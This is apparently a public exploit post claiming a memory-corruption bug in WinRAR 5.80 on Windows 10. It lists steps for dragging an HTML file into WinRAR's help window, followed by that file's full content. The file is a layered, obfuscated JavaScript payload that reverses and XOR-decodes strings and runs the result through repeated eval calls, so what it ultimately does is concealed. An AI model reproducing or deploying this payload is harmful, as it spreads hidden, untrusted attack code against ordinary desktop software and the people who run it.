Share
# Exploit Title: winrar memory corruption  
# Exploit Author: albalawi-s  
# Vendor Homepage: https://win-rar.com  
# Software Link: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe  
# Version: [5.80]  
# Tested on: [Microsoft Windows Version 10.0.18362.418 64bit]  
#https://twitter.com/test_app_______  
  
------------------------------------------------  
# poc video  
https://www.youtube.com/watch?v=NVDVP33kHuU  
  
# POC  
  
1- open winrar or any file.rar  
2- help  
3- help topics  
4- Drag the exploit.html to the window  
  
  
--------------------------------------------------  
Save the content html  
  
******************************************  
  
<script type="text/javascript">  
//<![CDATA[  
<!--  
var x="function f(x){var i,o=\"\",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" +  
"harAt(i);}catch(e){}}return o;}f(\")\\\"function f(x,y){var i,o=\\\"\\\\\\\""+  
"\\\\,l=x.length;for(i=0;i<l;i++){y%=127;o+=String.fromCharCode(x.charCodeAt" +  
"(i)^(y++));}return o;}f(\\\"\\\\K_RG^Q[B\\\\\\\\031OKSOYQP\\\\\\\\027b}*7))" +  
"x\\\\\\\\033:\\\\\\\\025$w!(:.p9&'$x3&-0,f\\\\\\\\000\\\\\\\\177&r\\\\\\\\0" +  
"25\\\\\\\\000O\\\\\\\\000\\\\\\\\013\\\\\\\\010\\\\\\\\026\\\\\\\\006\\\\\\" +  
"\\034\\\\\\\\000\\\\\\\\010\\\\\\\\007\\\\\\\\t1LO\\\\\\\\023\\\\\\\\036\\\\"+  
"\\\\034\\\\\\\\007\\\\\\\\021\\\\\\\\033\\\\\\\\002J$[3>AE\\\\\\\\\\\"\\\\\\"+  
"\\\\\\\\\"\\\\?^qXk:jm}k+dyz\\\\\\\\177=tcf}c+K:\\\\\\\\\\\\\\\\bkuo{l|\\\\" +  
"\\\\003\\\\\\\\002@KKRBF]\\\\\\\\027w\\\\\\\\016\\\\\\\\000\\\\\\\\037s\\\\" +  
"\\\\022\\\\\\\\017nAh[\\\\\\\\nUW]C\\\\\\\\005`ObQ|2!1-52g$($,9,)*m\\\\\\\\" +  
"rp\\\\\\\\005\\\\\\\\026\\\\\\\\0065%1).u\\\\\\\\0313=0\\\\\\\\004\\\\\\\\0" +  
"04>AZ9\\\\\\\\024;\\\\\\\\0065\\\\\\\\0307\\\\\\\\002MNO4\\\\\\\\030\\\\\\\\"+  
"037S\\\\\\\\007\\\\\\\\035\\\\\\\\032WX%\\\\\\\\010'\\\\\\\\022]^ Rgw$vnk(4" +  
"*H~ho{u^pyqvb?D;Mh\\\\\\\\177owoT\\\\\\\\017qKAIJ{\\\\\\\\n\\\\\\\\000\\\\\\"+  
"\\n\\\\\\\\013p_rA\\\\\\\\020\\\\\\\\021\\\\\\\\022pUYZ\\\\\\\\027KQV\\\\\\" +  
"\\025nHP\\\\\\\\027\\\\\\\\034c\\\\\\\\036a\\\\\\\\030g%*,g/3)\\\\\\\\021l\\"+  
"\\\\\\023r\\\\\\\\rpztu\\\\\\\\n%\\\\\\\\0047z{|\\\\\\\\016;+@\\\\\\\\022\\" +  
"\\\\\\n\\\\\\\\017DXF)\\\\\\\\007\\\\\\\\035\\\\\\\\002\\\\\\\\002\\\\\\\\0" +  
"02\\\\\\\\nNOPQ.\\\\\\\\001(\\\\\\\\033VWX%\\\\\\\\010'\\\\\\\\022AQsbpjtq8" +  
"[zUd7\\\\\\\\177n|f`e2gmes*D;n~di1uAWCPGWOW\\\\\\\\\\\\\\\\u\\\\\\\\010\\\\" +  
"\\\\025p_rAVD\\\\\\\\\\\\\\\\P@\\\\\\\\\\\\\\\\YY\\\\\\\\030\\\\\\\\\\\\\\\\"+  
"B\\\\\\\\023\\\\\\\\025\\\\\\\\035Ec2\\\\\\\\035,\\\\\\\\03703'5h+?-*(<omq\\"+  
"\\\\\\016q\\\\\\\\010wm\\\\\\\\013*\\\\\\\\0054\\\\\\\\007(;1-@I\\\\\\\\024" +  
"\\\\\\\\002\\\\\\\\026E\\\\\\\\017GUIZPL\\\\\\\\004NSPDBCDEFGCY\\\\\\\\023P" +  
"WT^{]p_jYr[|k\\\\\\\\177mjh|/;,2O6m\\\\\\\\\\\"\\\\&D;!GnApCT\\\\\\\\\\\\\\" +  
"\\~QxKzS^HX\\\\\\\\013NXHIUC\\\\\\\\000\\\\\\\\023\\\\\\\\t\\\\\\\\025TB^__" +  
"I\\\\\\\\007aLc.\\\\\\\\0356%+7fo!iwk|vn&pmrfdefgcy3pwt~$<\\\\\\\\023>\\\\\\"+  
"\\r8\\\\\\\\021:\\\\\\\\023\\\\\\\\n\\\\\\\\034\\\\\\\\014\\\\\\\\r\\\\\\\\" +  
"t\\\\\\\\037\\\\\\\\\\\\\\\\O[LR\\\\\\\\021\\\\\\\\001\\\\\\\\023\\\\\\\\02" +  
"0\\\\\\\\022\\\\\\\\nB&\\\\\\\\t \\\\\\\\023\\\\\\\\\\\"\\\\t|^qXkZslfi~ah`" +  
"{>e{gxp6*8{o}zxl-\\\\\\\\033}P\\\\\\\\177JXzUtG\\\\\\\\026\\\\\\\\004_N\\\\" +  
"\\\\\\\\\\\\F@E\\\\\\\\014\\\\\\\\017\\\\\\\\033]SV\\\\\\\\\\\\\\\\\\\\\\\\" +  
"007\\\\\\\\006YSYG\\\\\\\\037//.,%!{\\\\\\\\033j,2ce\\\\\\\\021lq\\\\\\\\01" +  
"4#\\\\\\\\016=hz7i\\\\\\\\004+\\\\\\\\0065`r<0\\\\\\\\004\\\\\\\\030\\\\\\\\"+  
"\\\\\\\\?\\\\\\\\0269\\\\\\\\010[G\\\\\\\\001\\\\\\\\036\\\\\\\\006\\\\\\\\" +  
"000SLFKAI\\\"\\\\,47)\\\"(f};)lo,0(rtsbus.o nruter};)i(tArahc.x=+o{)--i;0=>" +  
"i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)74=!)31/l(tAedoCrahc.x(elihw;lo=l,ht" +  
"gnel.x=lo,\\\"\\\"=o,i rav{)x(f noitcnuf\")" ;  
while(x=eval(x));  
//-->  
//]]>  
</script>